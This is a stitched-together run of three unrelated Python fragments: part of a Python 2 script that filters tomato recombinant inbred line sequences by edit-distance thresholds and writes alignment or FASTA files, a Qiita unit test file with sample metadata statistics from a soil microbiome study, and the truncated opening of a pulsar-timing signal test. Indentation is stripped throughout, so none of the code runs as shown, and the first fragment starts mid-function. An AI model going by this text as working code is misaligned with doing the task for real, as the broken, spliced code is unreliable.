maxdist = 0
dists = []
# CALCULATE PAIRWISE, MIN AND MAX DISTANCES
sourceskeys = sourcesStrs.keys()
for spp1 in sourceskeys:
#print "spp1", spp1p, spp1n
spp1seq = sourcesStrs[ spp1 ]
dist = editdist.distance( refsStrs, spp1seq )
if dist > 0:
dists.append( dist )
distMatrix[ spp1 ] = dist
if dist < mindist:
mindist = dist
if dist > maxdist:
maxdist = dist
dists.sort()
print 'MIN DIST ', mindist
print 'MAX DIST ', maxdist
print 'DISTS ', len(dists), " ".join(["%3d" % x for x in dists])
median = dists[ int((len(dists) / 2) + 0.5) ]
vals = [ x for x in dists if x <= median ]
print 'MEDIAN ', median
delta = maxdist - median
print 'DELTA ', delta
threshold_low = mindist + delta
threshold_hig = median - delta
print 'THRESHOLD LOW ', threshold_low
print 'THRESHOLD HIGH', threshold_hig
good_low = [ k for k in distMatrix if distMatrix[k] <= threshold_low ]
good_hig = [ k for k in distMatrix if distMatrix[k] >= threshold_hig ]
invalids = [ k for k in distMatrix if distMatrix[k] > threshold_low and distMatrix[k] < threshold_hig ]
valids = good_low + good_hig
good_low.sort()
good_hig.sort()
invalids.sort()
valids.sort()
print 'GOOD LOW ', len(good_low), good_low
print 'GOOD HIGH ', len(good_hig), good_hig
print 'INVALIDS ', len(invalids), invalids
print 'VALIDS ', len(valids ), valids
#print 'DISTS ', len(dists), " ".join(["%3d" % x for x in dists])
#
#median_global = dists[ int((len(dists) / 2) + 0.5) ]
#vals_low = [ x for x in dists if x <= median_global ]
#vals_hig = [ x for x in dists if x > median_global ]
#
#print 'MEDIAN GLOBAL ', median_global
#print 'VALS LOW ', len(vals_low), " ".join(["%3d" % x for x in vals_low])
#print 'VALS HIGH ', len(vals_hig), " ".join(["%3d" % x for x in vals_hig])
#
#median_low = vals_low[ int((len(vals_low) / 2) + 0.5) ]
#median_hig = vals_hig[ int((len(vals_hig) / 2) + 0.5) ]
#
#print 'MEDIAN LOW ', median_low
#print 'MEDIAN HIGH ', median_hig
#
#delta_low = median_low - mindist
#delta_hig = maxdist - median_hig
#
#print 'DELTA LOW ', delta_low
#print 'DELTA HIGH ', delta_hig
#
#threshold_low = median_low + delta_low
#threshold_hig = median_hig - delta_hig
#
#print 'THRESHOLD LOW ', threshold_low
#print 'THRESHOLD HIGH', threshold_hig
#
#good_low = [ k for k in distMatrix if distMatrix[k] <= median_low ]
#good_hig = [ k for k in distMatrix if distMatrix[k] >= median_hig ]
#bad = [ k for k in distMatrix if distMatrix[k] > median_low and distMatrix[k] < median_hig ]
#
#print 'GOOD LOW ', len(good_low), good_low
#print 'GOOD HIGH ', len(good_hig), good_hig
#print 'BAD ', len(bad ), bad
return ( good_hig, good_low, valids, invalids )
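# Worked example of the thresholding above (hypothetical distances, Python 2
# integer division as in the code): dists = [1, 2, 9, 10] gives mindist=1,
# maxdist=10, median=dists[int(4/2 + 0.5)]=dists[2]=9 and delta=10-9=1, so
# threshold_low=1+1=2 and threshold_hig=9-1=8; sequences at distance <= 2 end
# up in good_low, those >= 8 in good_hig, and anything in between is invalid.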
def grouper_linkage( config, refsStrs, sourcesStrs, emptyStr ):
#entropy_cutoff = config[ 'RILentro' ]
#
##print "len names", len(names)
#model = bioMixture.getModel(3, len(refsStrs))
##print model
#sourcesKeys = sourcesStrs.keys()
#dataset = [list(sourcesStrs[x]) for x in sourcesKeys ]
##print dataset
#data = mixture.DataSet()
#data.fromList( dataset, IDs=sourcesKeys )
##print data
#model.EM(data, 40, entropy_cutoff)
#c = model.classify( data, labels=sourcesKeys, entropy_cutoff=entropy_cutoff )#, silent=1)
#print len(c), c
#clusters = defaultdict( list )
#for spppos, clusternum in enumerate(c):
# clusters[ clusternum ].append( sourcesKeys[ spppos ] )
#
#for key in clusters:
# spps = clusters[ key ]
#
# dists = []
# for x in range(1, len(spps)):
# dists.append( editdist.distance( sourcesStrs[ spps[0] ], sourcesStrs[ spps[x] ] ) )
# print 'key', key, 'dists', dists
tolerance = config[ 'RILmads' ]
distMatrix = {}
mindist = sys.maxint
maxdist = 0
# CALCULATE PAIRWISE, MIN AND MAX DISTANCES
sourceskeys = sourcesStrs.keys()
for spp1p, spp1n in enumerate( sourceskeys ):
#print "spp1", spp1p, spp1n
for spp2n in sourceskeys[spp1p+1:]:
#print " spp2", sourceskeys.index(spp2n), spp2n
sppKey = tuple(set(sorted( [ spp1n, spp2n ] )))
dist = editdist.distance( sourcesStrs[ spp1n ], sourcesStrs[ spp2n ] )
#print " sppKey", sppKey, 'dist', dist
distMatrix[ sppKey ] = dist
if dist < mindist:
mindist = dist
if dist > maxdist:
maxdist = dist
# CALCULATE DELTA OF DISTANCE FOR SCALE
deltadist = (maxdist - mindist) * 1.0
print 'min', mindist, 'max', maxdist, 'delta', deltadist
# NORMALIZE THE DATA
for sppKey in distMatrix:
#print "norma %-60s %4d" % ( str(sppKey), distMatrix[ sppKey ] ),
if deltadist == 0:
distMatrix[ sppKey ] = 1.0
else:
distMatrix[ sppKey ] = ( distMatrix[ sppKey ] - mindist ) / deltadist # convert to percentage
#print "%.4f" % distMatrix[ sppKey ]
# SEPARATE IN TWO GROUPS: REFERENCE (d<0.5) AND WILD (d>=0.5)
tolvalsmin = []
tolvalsmax = []
for sppKey in distMatrix:
spp1 = sppKey[ 0 ]
spp2 = sppKey[ 1 ]
dist = distMatrix[ sppKey ]
if dist >= 0.5:
tolvalsmax.append( dist )
else:
tolvalsmin.append( dist )
tolvalsmin.sort()
tolvalsmax.sort()
# CALCULATE MIDPOINTS FOR EACH GROUP TO CALCULATE MEDIAN
#print 'tol vals', tolvals
tolvalsminmidpoint = int( (len(tolvalsmin) / 2) + 0.5)
tolvalsmaxmidpoint = int( (len(tolvalsmax) / 2) + 0.5)
print 'tol val min midpoint', tolvalsminmidpoint, 'tol val min len', len( tolvalsmin )
print 'tol val max midpoint', tolvalsmaxmidpoint, 'tol val max len', len( tolvalsmax )
# CALCULATE MEDIAN FOR EACH GROUP
tolvalsminmedian = tolvalsmin[ tolvalsminmidpoint ]
tolvalsmaxmedian = tolvalsmax[ tolvalsmaxmidpoint ]
print "dist min median", tolvalsminmedian
print "dist max median", tolvalsmaxmedian
# CALCULATE MAD
tolvalsminMADs = [ abs(x - tolvalsminmedian) for x in tolvalsmin ]
tolvalsmaxMADs = [ abs(x - tolvalsmaxmedian) for x in tolvalsmax ]
tolvalsminMADs.sort()
tolvalsmaxMADs.sort()
#for y, x in enumerate(tolvalsmin):
# print 'min pos %4d val %.5f diff %.5f' % ( y, x, abs(x - tolvalsminmedian) )
#for y, x in enumerate(tolvalsmax):
# print 'max pos %4d val %.5f diff %.5f' % ( y, x, abs(x - tolvalsmaxmedian) )
#print 'tol mads', tolMADs
tolvalsminMAD = tolvalsminMADs[ tolvalsminmidpoint ]
tolvalsmaxMAD = tolvalsmaxMADs[ tolvalsmaxmidpoint ]
print 'MAD min before', tolvalsminMAD
print 'MAD max before', tolvalsmaxMAD
print 'tolerance ', tolerance
if tolerance > 0:
tolvalsminMAD = tolvalsminMAD * tolerance
tolvalsmaxMAD = tolvalsmaxMAD * tolerance
print 'MAD min tolerance', tolvalsminMAD
print 'MAD max tolerance', tolvalsmaxMAD
tolvalsmaxMAD = 1 - tolvalsmaxMAD
print 'MAD min final', tolvalsminMAD
print 'MAD max final', tolvalsmaxMAD
# DEFINE WHICH INDIVIDUALS PASS THRESHOLD OF SIMILARITY
setsSim = defaultdict( set )
setsDis = defaultdict( set )
for sppKey in distMatrix:
spp1 = sppKey[ 0 ]
spp2 = sppKey[ 1 ]
dist = distMatrix[ sppKey ]
#print "%.4f" % distMatrix[ sppKey ],
if dist <= tolvalsminMAD:
setsSim[ spp1 ].add( spp2 )
setsSim[ spp2 ].add( spp1 )
#print '+'
elif dist >= tolvalsmaxMAD:
setsDis[ spp1 ].add( spp2 )
setsDis[ spp2 ].add( spp1 )
#print '-'
else:
#print
pass
print 'len sim', len(setsSim), 'dis', len(setsDis)
similar = set()
dissimilar = set()
# GENERATE FINAL LISTS
# LIST OF SIMILAR TO REFERENCE
for spp in setsSim:
sppset = setsSim[ spp ]
#print "spp SIM %-30s %s" % ( spp, str( sppset ) )
similar = similar.union( sppset )
# LIST OF DISSIMILAR TO REFERENCE
for spp in setsDis:
sppset = setsDis[ spp ]
#print "spp DIS %-30s %s" % ( spp, str( sppset ) )
dissimilar = dissimilar.union( sppset )
# MERGE SIMILAR AND DISSIMILAR LISTS INTO VALID LIST
# ADD REMAINING SPECIES INTO INVALID SPECIES
shared = dissimilar.intersection( similar )
simonly = similar.difference( dissimilar )
disonly = dissimilar.difference( similar )
valids = set().union(similar, dissimilar)
invalids = set(sourceskeys).difference(valids)
print "Similar ", len(sorted(list( similar ))), sorted(list( similar ))
print "Disimilar", len(sorted(list( dissimilar ))), sorted(list( dissimilar ))
print
print "Shared ", len(sorted(list( shared ))), sorted(list( shared ))
print "Sim Only ", len(sorted(list( simonly ))), sorted(list( simonly ))
print "Dis Only ", len(sorted(list( disonly ))), sorted(list( disonly ))
print
print "Valids ", len(sorted(list( valids ))), sorted(list( valids ))
print "Invalids ", len(sorted(list( invalids ))), sorted(list( invalids ))
#Similar 31 ['609', '610', '612', '614', '615', '623', '634', '644', '649', '651', '654', '660', '665', '666', '667', '668', '670', '674', '676', '679', '685', '688', '692', '693', '694', '697', '702', '706', '710', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LYC2740']
#Disimilar 45 ['609', '610', '612', '614', '615', '618', '623', '625', '626', '634', '644', '649', '651', '653', '654', '659', '660', '665', '666', '667', '668', '670', '674', '676', '679', '684', '685', '688', '691', '692', '693', '694', '696', '697', '702', '705', '706', '707', '710', '711', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2740', 'Spimpinellifolium LYC2798']
#
#Shared 31 ['609', '610', '612', '614', '615', '623', '634', '644', '649', '651', '654', '660', '665', '666', '667', '668', '670', '674', '676', '679', '685', '688', '692', '693', '694', '697', '702', '706', '710', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LYC2740']
#Sim Only 0 []
#Dis Only 14 ['618', '625', '626', '653', '659', '684', '691', '696', '705', '707', '711', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2798']
#
#Valids 45 ['609', '610', '612', '614', '615', '618', '623', '625', '626', '634', '644', '649', '651', '653', '654', '659', '660', '665', '666', '667', '668', '670', '674', '676', '679', '684', '685', '688', '691', '692', '693', '694', '696', '697', '702', '705', '706', '707', '710', '711', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2740', 'Spimpinellifolium LYC2798']
#Invalids 20 ['601', '603', '608', '611', '619', '622', '624', '630', '631', '639', '643', '646', '648', '656', '658', '669', '675', '678', '682', '701']
return ( sorted(list(dissimilar)), sorted(list(similar)), sorted(list( valids )), sorted(list( invalids)) )
def filterSimilarity( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr ):
minsim = config[ 'RILminsim' ]
# CALCULATE PERCENTAGE OF SIMILARITY TO REFERENCE
refsims = {}
for spp in valids:
sppseq = sourcesStrs[ spp ]
refsim = 0
for nucPos, nucSeq in enumerate( sppseq ):
refSeq = refsStrs[ nucPos ]
if refSeq == nucSeq:
refsim += 1
refsims[ spp ] = ( float( refsim ) / float( len( sppseq ) ) )
#print 'REF', refsStrs
#print 'ALT', altsStrs
# REPLACE SEQUENCES WITH EITHER REFERENCE OR ALTERNATIVE
modsCount = defaultdict( int )
for spp in sourcesStrs:
if spp in refsims:
if refsims[ spp ] > minsim:
modsCount[ 'REF' ] += 1
else:
modsCount[ 'ALT' ] += 1
invalids[ spp ] = valids[ spp ]
del valids[ spp ]
#for sppPos, sppNucs in enumerate( nucs ):
#print sppNucs, list(sppNucs), dict(sppNucs), sppNucs.values()
for key in modsCount:
print "count", key, modsCount[ key ]
print "count NNN", len( invalids )
return ( valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
def filter( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr ):
greedy = config[ 'RILgreedy' ]
# IF IN GREEDY MODE, FIX NUCLEOTIDES FROM VALIDs
if greedy:
# COUNT NUCLEOTIDES IN EACH POSITION
nucs = []
for spp in sourcesStrs:
sppseq = sourcesStrs[ spp ]
for nucPos, nuc in enumerate( sppseq ):
if len( nucs ) <= nucPos:
nucs.append( Counter() )
nucs[ nucPos ].update( [ nuc ] )
# GENERATE ALTERNATIVE STRING
altsStrs = ""
refsStrsN = ""
emptyStr = ""
for nucPos, nucRef in enumerate( refsStrs ):
nucData = list( nucs[ nucPos ] )
if len( nucData ) != 2:
print "BAD BAD BAD SEQUENCE. MORE THAN TWO VARIANTES TO THE SAME POSITION", nucData
altsStrs += '-'
refsStrsN += '-'
emptyStr += '-'
else:
#print 'pos %3d data %-10s ref %s' % ( nucPos, str(nucData), nucRef ),
nucData.remove( nucRef )
nucAlt = nucData[0]
#print 'alt', nucAlt
altsStrs += nucAlt
refsStrsN += nucRef
emptyStr += 'N'
refsStrs = refsStrsN
for spp in sourcesStrs:
if spp in low:
sourcesStrs[ spp ] = refsStrs
#print " fixing spp %-30s to REF" % ( spp )
#print " fixing spp %-30s to ALT" % ( spp )
#sourcesStrs[ spp ] = refsStrs
#sourcesStrs[ spp ] = altsStrs
elif spp in high:
sourcesStrs[ spp ] = altsStrs
if config['RILdelete']:
for spp in sourcesStrs.keys():
#sppseq = sourcesStrs[spp]
#= "".join( sources[spp] )
if spp in invalids:
#print "spp", spp, 'is invalid. converting to NNN'
del sourcesStrs[spp]
# CONVERT UNCLUSTERED SEQUENCES TO N
for spp in sourcesStrs:
#sppseq = sourcesStrs[spp]
#= "".join( sources[spp] )
if spp in invalids:
#print "spp", spp, 'is invalid. converting to NNN'
sourcesStrs[spp] = emptyStr
return refsStrs, sourcesStrs, emptyStr
def printfilename(config, chro, coords=False):
inchr = config['inchr' ]
instart = config['instart']
inend = config['inend' ]
posstr = ''
if (instart is not None) or (inend is not None):
if (instart is not None) and (inend is not None):
posstr = '_%06d-%06d' % (instart, inend)
elif (instart is not None):
posstr = '_%06d-end' % (instart)
elif (inend is not None):
posstr = '_000000-%06d' % (inend)
ext = '.aln'
if config['format'] == 'fasta':
ext = '.fasta'
if coords:
ext += '.coords'
outfile = config['infile'] + '.' + chro + posstr + ext
return outfile
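# For example (hypothetical inputs), with config['infile']='sample.vcf.gz',
# chro='SL2.40ch06', instart=100001, inend=150000 and fasta output, this
# returns 'sample.vcf.gz.SL2.40ch06_100001-150000.fasta'.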
def printfileopen(config, spp, chro, header=None):
"""
Save to file
"""
if config['ouchr'] != chro:
print " printing aln chromosome '%s'" % chro
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
config['ouchr'] = chro
outfile = printfilename(config, chro)
if config['oufhd'] is None:
print " opening %s" % outfile
config['oufhd'] = open(outfile, 'w')
if header is not None:
config['oufhd'].write(header)
def printfilealn(config, spp, line, chro):
"""
Print alignment header
"""
printfileopen(config, spp, chro, header='CLUSTAL multiple sequence alignment\n\n\n')
config['oufhd'].write(config['sppmaxlength'] % spp)
config['oufhd'].write(line)
config['oufhd'].write("\n")
def printfilefasta(config, spp, line, chro):
"""
Print fasta header
"""
printfileopen(config, spp, chro)
config['oufhd'].write('>' + spp + "\n")
for frag in xrange(0, len(line), 60):
config['oufhd'].write(line[frag:frag+60])
config['oufhd'].write("\n")
config['oufhd'].write("\n")
def printfilecoords(config, chro):
outfile = printfilename(config, chro, coords=True)
print "exporting coords to %s" % outfile
coords = config['coords' ]
with open(outfile, 'w') as fhd:
fhd.write( str( len( coords ) ) )
fhd.write( "\n" )
fhd.write( "|".join( [ str(x) for x in sorted(coords) ] ) )
if __name__ == '__main__':
main(sys.argv[1:])
|
|
#!/usr/bin/env python
from __future__ import division
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
import os
from unittest import TestCase, main
import tempfile
import h5py
import numpy as np
from future.utils.six import StringIO, BytesIO
from qiita_db.metadata_template import SampleTemplate, PrepTemplate
from qiita_ware.util import (per_sample_sequences, stats_from_df, open_file,
_is_string_or_bytes)
def mock_sequence_iter(items):
return ({'SequenceID': sid, 'Sequence': seq} for sid, seq in items)
class UtilTests(TestCase):
def setUp(self):
np.random.seed(123)
def test_per_sample_sequences_simple(self):
max_seqs = 10
        # note, the result here is sorted by sequence_id but is in heap order
        # by the random values associated with each sequence
exp = sorted([('b_2', 'AATTGGCC-b2'),
('a_5', 'AATTGGCC-a5'),
('a_1', 'AATTGGCC-a1'),
('a_4', 'AATTGGCC-a4'),
('b_1', 'AATTGGCC-b1'),
('a_3', 'AATTGGCC-a3'),
('c_3', 'AATTGGCC-c3'),
('a_2', 'AATTGGCC-a2'),
('c_2', 'AATTGGCC-c2'),
('c_1', 'AATTGGCC-c1')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs)
self.assertEqual(sorted(obs), exp)
def test_per_sample_sequences_min_seqs(self):
max_seqs = 10
min_seqs = 3
        # note, the result here is sorted by sequence_id but is in heap order
        # by the random values associated with each sequence
exp = sorted([('a_5', 'AATTGGCC-a5'),
('a_1', 'AATTGGCC-a1'),
('a_4', 'AATTGGCC-a4'),
('a_3', 'AATTGGCC-a3'),
('c_3', 'AATTGGCC-c3'),
('a_2', 'AATTGGCC-a2'),
('c_2', 'AATTGGCC-c2'),
('c_1', 'AATTGGCC-c1')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs,
min_seqs)
self.assertEqual(sorted(obs), exp)
def test_per_sample_sequences_complex(self):
max_seqs = 2
exp = sorted([('b_2', 'AATTGGCC-b2'),
('b_1', 'AATTGGCC-b1'),
('a_2', 'AATTGGCC-a2'),
('a_3', 'AATTGGCC-a3'),
('c_1', 'AATTGGCC-c1'),
('c_2', 'AATTGGCC-c2')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs)
self.assertEqual(sorted(obs), exp)
def test_stats_from_df(self):
obs = stats_from_df(SampleTemplate(1).to_dataframe())
for k in obs:
self.assertEqual(obs[k], SUMMARY_STATS[k])
def test_dataframe_from_template(self):
template = PrepTemplate(1)
obs = template.to_dataframe()
# 27 samples
self.assertEqual(len(obs), 27)
        self.assertEqual(set(obs.index), {
u'SKB1.640202', u'SKB2.640194', u'SKB3.640195', u'SKB4.640189',
u'SKB5.640181', u'SKB6.640176', u'SKB7.640196', u'SKB8.640193',
u'SKB9.640200', u'SKD1.640179', u'SKD2.640178', u'SKD3.640198',
u'SKD4.640185', u'SKD5.640186', u'SKD6.640190', u'SKD7.640191',
u'SKD8.640184', u'SKD9.640182', u'SKM1.640183', u'SKM2.640199',
u'SKM3.640197', u'SKM4.640180', u'SKM5.640177', u'SKM6.640187',
u'SKM7.640188', u'SKM8.640201', u'SKM9.640192'})
        self.assertEqual(set(obs.columns), {
u'tot_org_carb', u'common_name', u'has_extracted_data',
u'required_sample_info_status', u'water_content_soil',
u'env_feature', u'assigned_from_geo', u'altitude', u'env_biome',
u'texture', u'has_physical_specimen', u'description_duplicate',
u'physical_location', u'latitude', u'ph', u'host_taxid',
u'elevation', u'description', u'collection_timestamp',
u'taxon_id', u'samp_salinity', u'host_subject_id', u'sample_type',
u'season_environment', u'temp', u'country', u'longitude',
u'tot_nitro', u'depth', u'anonymized_name', u'target_subfragment',
u'sample_center', u'samp_size', u'run_date', u'experiment_center',
u'pcr_primers', u'center_name', u'barcodesequence', u'run_center',
u'run_prefix', u'library_construction_protocol', u'emp_status',
u'linkerprimersequence', u'experiment_design_description',
u'target_gene', u'center_project_name', u'illumina_technology',
u'sequencing_meth', u'platform', u'experiment_title',
u'study_center'})
class TestFilePathOpening(TestCase):
"""Tests adapted from scikit-bio's skbio.io.util tests"""
def test_is_string_or_bytes(self):
self.assertTrue(_is_string_or_bytes('foo'))
self.assertTrue(_is_string_or_bytes(u'foo'))
self.assertTrue(_is_string_or_bytes(b'foo'))
self.assertFalse(_is_string_or_bytes(StringIO('bar')))
self.assertFalse(_is_string_or_bytes([1]))
def test_file_closed(self):
"""File gets closed in decorator"""
f = tempfile.NamedTemporaryFile('r')
filepath = f.name
with open_file(filepath) as fh:
pass
self.assertTrue(fh.closed)
def test_file_closed_harder(self):
"""File gets closed in decorator, even if exceptions happen."""
f = tempfile.NamedTemporaryFile('r')
filepath = f.name
try:
with open_file(filepath) as fh:
raise TypeError
except TypeError:
self.assertTrue(fh.closed)
else:
# If we're here, no exceptions have been raised inside the
# try clause, so the context manager swallowed them. No
# good.
raise Exception("`open_file` didn't propagate exceptions")
def test_filehandle(self):
"""Filehandles slip through untouched"""
with tempfile.TemporaryFile('r') as fh:
with open_file(fh) as ffh:
self.assertTrue(fh is ffh)
# And it doesn't close the file-handle
self.assertFalse(fh.closed)
def test_StringIO(self):
"""StringIO (useful e.g. for testing) slips through."""
f = StringIO("File contents")
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_BytesIO(self):
"""BytesIO (useful e.g. for testing) slips through."""
f = BytesIO(b"File contents")
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_hdf5IO(self):
f = h5py.File('test', driver='core', backing_store=False)
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_hdf5IO_open(self):
name = None
with tempfile.NamedTemporaryFile(delete=False) as fh:
name = fh.name
fh.close()
h5file = h5py.File(name, 'w')
h5file.close()
with open_file(name) as fh_inner:
self.assertTrue(isinstance(fh_inner, h5py.File))
os.remove(name)
# the comment after each sequence indicates its expected random value
sequences = [
('a_1', 'AATTGGCC-a1'), # 2, 3624216819017203053
('a_2', 'AATTGGCC-a2'), # 5, 5278339153051796802
('b_1', 'AATTGGCC-b1'), # 4, 4184670734919783522
('b_2', 'AATTGGCC-b2'), # 0, 946590342492863505
('a_4', 'AATTGGCC-a4'), # 3, 4048487933969823850
('a_3', 'AATTGGCC-a3'), # 7, 7804936597957240377
('c_1', 'AATTGGCC-c1'), # 8, 8868534167180302049
('a_5', 'AATTGGCC-a5'), # 1, 3409506807702804593
('c_2', 'AATTGGCC-c2'), # 9, 8871627813779918895
('c_3', 'AATTGGCC-c3') # 6, 7233291490207274528
]
SUMMARY_STATS = {
'altitude': [('0.0', 27)],
'anonymized_name': [('SKB1', 1),
('SKB2', 1),
('SKB3', 1),
('SKB4', 1),
('SKB5', 1),
('SKB6', 1),
('SKB7', 1),
('SKB8', 1),
('SKB9', 1),
('SKD1', 1),
('SKD2', 1),
('SKD3', 1),
('SKD4', 1),
('SKD5', 1),
('SKD6', 1),
('SKD7', 1),
('SKD8', 1),
('SKD9', 1),
('SKM1', 1),
('SKM2', 1),
('SKM3', 1),
('SKM4', 1),
('SKM5', 1),
('SKM6', 1),
('SKM7', 1),
('SKM8', 1),
('SKM9', 1)],
'assigned_from_geo': [('n', 27)],
'barcodesequence': [('AACTCCTGTGGA', 1),
('ACCTCAGTCAAG', 1),
('ACGCACATACAA', 1),
('AGCAGGCACGAA', 1),
('AGCGCTCACATC', 1),
('ATATCGCGATGA', 1),
('ATGGCCTGACTA', 1),
('CATACACGCACC', 1),
('CCACCCAGTAAC', 1),
('CCGATGCCTTGA', 1),
('CCTCGATGCAGT', 1),
('CCTCTGAGAGCT', 1),
('CGAGGTTCTGAT', 1),
('CGCCGGTAATCT', 1),
('CGGCCTAAGTTC', 1),
('CGTAGAGCTCTC', 1),
('CGTGCACAATTG', 1),
('GATAGCACTCGT', 1),
('GCGGACTATTCA', 1),
('GTCCGCAAGTTA', 1),
('TAATGGTCGTAG', 1),
('TAGCGCGAACTT', 1),
('TCGACCAAACAC', 1),
('TGAGTGGTCTGT', 1),
('TGCTACAGACGT', 1),
('TGGTTATGGCAC', 1),
('TTGCACCGTCGA', 1)],
'center_name': [('ANL', 27)],
'center_project_name': [('None', 27)],
'collection_timestamp': [('2011-11-11 13:00:00', 27)],
'common_name': [('rhizosphere metagenome', 9),
('root metagenome', 9),
('soil metagenome', 9)],
'country': [('GAZ:United States of America', 27)],
'data_type_id': [('2', 27)],
'depth': [('0.15', 27)],
'description': [('Cannabis Soil Microbiome', 27)],
'description_duplicate': [('Bucu Rhizo', 3),
('Bucu Roots', 3),
('Bucu bulk', 3),
('Burmese Rhizo', 3),
('Burmese bulk', 3),
('Burmese root', 3),
('Diesel Rhizo', 3),
('Diesel Root', 3),
('Diesel bulk', 3)],
'dna_extracted': [('True', 27)],
'ebi_study_accession': [('None', 27)],
'ebi_submission_accession': [('None', 27)],
'elevation': [('114.0', 27)],
'emp_status': [('EMP', 27)],
'env_biome': [('ENVO:Temperate grasslands, savannas, and shrubland biome',
27)],
'env_feature': [('ENVO:plant-associated habitat', 27)],
'experiment_center': [('ANL', 27)],
'experiment_design_description': [('micro biome of soil and rhizosphere '
'of cannabis plants from CA', 27)],
'experiment_title': [('Cannabis Soil Microbiome', 27)],
'host_subject_id': [('1001:B1', 1),
('1001:B2', 1),
('1001:B3', 1),
('1001:B4', 1),
('1001:B5', 1),
('1001:B6', 1),
('1001:B7', 1),
('1001:B8', 1),
('1001:B9', 1),
('1001:D1', 1),
('1001:D2', 1),
('1001:D3', 1),
('1001:D4', 1),
('1001:D5', 1),
('1001:D6', 1),
('1001:D7', 1),
('1001:D8', 1),
('1001:D9', 1),
('1001:M1', 1),
('1001:M2', 1),
('1001:M3', 1),
('1001:M4', 1),
('1001:M5', 1),
('1001:M6', 1),
('1001:M7', 1),
('1001:M8', 1),
('1001:M9', 1)],
'host_taxid': [('3483', 27)],
'illumina_technology': [('MiSeq', 27)],
'latitude': [('0.291867635913', 1),
('3.21190859967', 1),
('4.59216095574', 1),
('10.6655599093', 1),
('12.6245524972', 1),
('12.7065957714', 1),
('13.089194595', 1),
('23.1218032799', 1),
('29.1499460692', 1),
('31.7167821863', 1),
('35.2374368957', 1),
('38.2627021402', 1),
('40.8623799474', 1),
('43.9614715197', 1),
('44.9725384282', 1),
('53.5050692395', 1),
('57.571893782', 1),
('60.1102854322', 1),
('63.6505562766', 1),
('68.0991287718', 1),
('68.51099627', 1),
('74.0894932572', 1),
('78.3634273709', 1),
('82.8302905615', 1),
('84.0030227585', 1),
('85.4121476399', 1),
('95.2060749748', 1)],
'library_construction_protocol': [('This analysis was done as in Caporaso '
'et al 2011 Genome research. The PCR '
'primers (F515/R806) were developed '
'against the V4 region of the 16S rRNA '
'(both bacteria and archaea), which we '
'determined would yield optimal '
'community clustering with reads of '
'this length using a procedure '
'similar to that of ref. 15. [For '
'reference, this primer pair amplifies '
'the region 533_786 in the Escherichia '
'coli strain 83972 sequence '
'(greengenes accession no. '
'prokMSA_id:470367).] The reverse PCR '
'primer is barcoded with a 12-base '
'error-correcting Golay code to '
'facilitate multiplexing of up '
'to 1,500 samples per lane, and both '
'PCR primers contain sequencer adapter '
'regions.', 27)],
'linkerprimersequence': [('GTGCCAGCMGCCGCGGTAA', 27)],
'longitude': [
('2.35063674718', 1),
('3.48274264219', 1),
('6.66444220187', 1),
('15.6526750776', 1),
('26.8138925876', 1),
('27.3592668624', 1),
('31.2003474585', 1),
('31.6056761814', 1),
('32.5563076447', 1),
('34.8360987059', 1),
('42.838497795', 1),
('63.5115213108', 1),
('65.3283470202', 1),
('66.1920014699', 1),
('66.8954849864', 1),
('68.5041623253', 1),
('68.5945325743', 1),
('70.784770579', 1),
('74.423907894', 1),
('74.7123248382', 1),
('82.1270418227', 1),
('82.8516734159', 1),
('84.9722975792', 1),
('86.3615778099', 1),
('92.5274472082', 1),
('95.5088566087', 1),
('96.0693176066', 1)],
'pcr_primers': [('FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 27)],
'ph': [('6.8', 9), ('6.82', 10), ('6.94', 8)],
'physical_specimen_location': [('ANL', 27)],
'physical_specimen_remaining': [('True', 27)],
'platform': [('Illumina', 27)],
'required_sample_info_status': [('completed', 27)],
'run_center': [('ANL', 27)],
'run_date': [('8/1/12', 27)],
'run_prefix': [('s_G1_L001_sequences', 27)],
'samp_salinity': [('7.1', 9), ('7.15', 9), ('7.44', 9)],
'samp_size': [('.25,g', 27)],
'sample_center': [('ANL', 27)],
'sample_type': [('ENVO:soil', 27)],
'season_environment': [('winter', 27)],
'sequencing_meth': [('Sequencing by synthesis', 27)],
'study_center': [('CCME', 27)],
'target_gene': [('16S rRNA', 27)],
'target_subfragment': [('V4', 27)],
'taxon_id': [('410658', 9), ('939928', 9), ('1118232', 9)],
'temp': [('15.0', 27)],
'texture': [('63.1 sand, 17.7 silt, 19.2 clay', 9),
('64.6 sand, 17.6 silt, 17.8 clay', 9),
('66 sand, 16.3 silt, 17.7 clay', 9)],
'tot_nitro': [('1.3', 9), ('1.41', 9), ('1.51', 9)],
'tot_org_carb': [('3.31', 9), ('4.32', 9), ('5.0', 9)],
'water_content_soil': [('0.101', 9), ('0.164', 9), ('0.178', 9)]}
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_gp_signals
----------------------------------
Tests for GP signal modules.
"""
import unittest
import numpy as np
import scipy.linalg as sl
from enterprise.pulsar import Pulsar
from enterprise.signals import gp_signals, parameter, selections, signal_base, utils
from enterprise.signals.selections import Selection
from tests.enterprise_test_data import datadir
@signal_base.function
def create_quant_matrix(toas, dt=1):
U, _ = utils.create_quantization_matrix(toas, dt=dt, nmin=1)
avetoas = np.array([toas[idx.astype(bool)].mean() for idx in U.T])
    # return a value slightly different from 1 so these columns are not identical to the ECORR quantization columns
return U * 1.0000001, avetoas
@signal_base.function
